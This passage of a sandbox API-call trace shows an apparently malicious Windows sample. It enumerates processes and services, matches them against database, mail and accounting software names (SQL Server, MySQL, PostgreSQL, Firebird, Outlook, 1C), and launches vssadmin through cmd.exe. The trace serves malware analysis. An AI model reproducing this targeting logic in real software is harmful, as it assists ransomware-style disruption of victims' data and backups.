(lpString1="sqlservr.exe", lpString2="System") returned -1 [0059.132] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0059.133] lstrlenW (lpString="smss.exe") returned 8 [0059.133] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0059.133] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0059.133] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0059.134] lstrlenW (lpString="csrss.exe") returned 9 [0059.134] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0059.134] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0059.134] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0059.134] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0059.134] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0059.134] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0059.134] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0059.134] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0059.135] lstrlenW (lpString="wininit.exe") returned 11 [0059.135] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0059.135] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0059.135] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0059.135] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0059.136] lstrlenW (lpString="csrss.exe") returned 9 [0059.136] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0059.136] lstrlenW (lpString="winlogon.exe") returned 12 [0059.136] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0059.137] lstrlenW (lpString="services.exe") returned 12 [0059.137] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0059.138] lstrlenW (lpString="lsass.exe") returned 9 [0059.138] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0059.138] lstrlenW (lpString="lsm.exe") returned 7 [0059.138] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.139] lstrlenW (lpString="svchost.exe") returned 11 [0059.139] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.140] lstrlenW (lpString="svchost.exe") returned 11 [0059.140] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.141] lstrlenW (lpString="svchost.exe") returned 11 [0059.141] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.141] lstrlenW (lpString="svchost.exe") returned 11 [0059.141] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.142] lstrlenW (lpString="svchost.exe") returned 11 [0059.142] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0059.143] lstrlenW (lpString="audiodg.exe") returned 11 [0059.143] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.143] lstrlenW (lpString="svchost.exe") returned 11 [0059.143] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.144] lstrlenW (lpString="svchost.exe") returned 11 [0059.144] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0059.145] lstrlenW (lpString="dwm.exe") returned 7 [0059.145] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0059.146] lstrlenW (lpString="explorer.exe") returned 12 [0059.146] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0059.146] lstrlenW (lpString="spoolsv.exe") returned 11 [0059.146] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0059.147] lstrlenW (lpString="taskhost.exe") returned 12 [0059.147] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0059.148] lstrlenW (lpString="svchost.exe") returned 11 [0059.148] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0059.149] lstrlenW (lpString="taskeng.exe") returned 11 [0059.149] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0059.149] lstrlenW (lpString="taskhost.exe") returned 12 [0059.150] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0059.150] lstrlenW (lpString="called.exe") returned 10 [0059.150] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0059.151] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0059.151] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0059.152] lstrlenW (lpString="analyst.exe") returned 11 [0059.152] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0059.152] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0059.152] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0059.153] lstrlenW (lpString="wages.exe") returned 9 [0059.153] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0059.154] lstrlenW (lpString="rand.exe") returned 8 [0059.154] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0059.154] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0059.155] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0059.155] lstrlenW (lpString="cottage.exe") returned 11 [0059.155] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0059.156] lstrlenW (lpString="pairs_spec.exe") returned 14 [0059.156] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0059.157] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0059.157] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0059.157] lstrlenW (lpString="observationshairy.exe") returned 21 [0059.157] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0059.158] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0059.158] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0059.159] lstrlenW (lpString="spectrum.exe") returned 12 [0059.159] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0059.160] lstrlenW (lpString="dies.exe") returned 8 [0059.160] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0059.160] lstrlenW (lpString="configured.exe") returned 14 [0059.160] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0059.161] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0059.161] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0059.162] lstrlenW (lpString="fast.exe") returned 8 [0059.162] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0059.162] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0059.162] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0059.558] lstrlenW (lpString="review.exe") returned 10 [0059.563] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0059.578] lstrlenW (lpString="historybinding.exe") returned 18 [0059.586] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0059.612] lstrlenW (lpString="pk task surge.exe") returned 17 [0059.615] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0059.638] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0059.642] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0059.659] lstrlenW (lpString="ivttvf.exe") returned 10 [0059.662] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0059.731] lstrlenW (lpString="cmd.exe") returned 7 [0060.019] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0060.025] lstrlenW (lpString="conhost.exe") returned 11 [0060.026] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0060.033] lstrlenW (lpString="vssadmin.exe") returned 12 [0060.033] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0060.034] lstrlenW (lpString="VSSVC.exe") returned 9 [0060.034] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.034] lstrlenW (lpString="svchost.exe") returned 11 [0060.034] Process32NextW (in: hSnapshot=0x20c, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0060.035] CloseHandle (hObject=0x20c) returned 1 [0060.035] Sleep (dwMilliseconds=0x1f4) [0060.572] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5ef968 [0060.572] EnumServicesStatusExW (in: hSCManager=0x5ef968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0060.573] GetLastError () returned 0xea [0060.573] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x662fe8 [0060.573] EnumServicesStatusExW (in: hSCManager=0x5ef968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x662fe8, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x662fe8, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0060.573] CloseServiceHandle (hSCObject=0x5ef968) returned 1 [0060.573] lstrlenW (lpString="Appinfo") returned 7 [0060.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0060.574] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0060.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0060.574] lstrlenW (lpString="AudioSrv") returned 8 [0060.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0060.574] lstrlenW (lpString="BFE") returned 3 [0060.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0060.574] lstrlenW (lpString="CryptSvc") returned 8 [0060.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0060.574] lstrlenW (lpString="CscService") returned 10 [0060.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0060.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0060.574] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0060.574] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0060.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0060.575] lstrlenW (lpString="DcomLaunch") returned 10 [0060.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0060.575] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0060.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0060.575] lstrlenW (lpString="Dhcp") returned 4 [0060.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0060.575] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0060.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0060.575] lstrlenW (lpString="Dnscache") returned 8 [0060.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0060.575] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0060.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0060.575] lstrlenW (lpString="DPS") returned 3 [0060.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0060.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0060.575] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0060.575] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0060.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0060.575] lstrlenW (lpString="eventlog") returned 8 [0060.575] 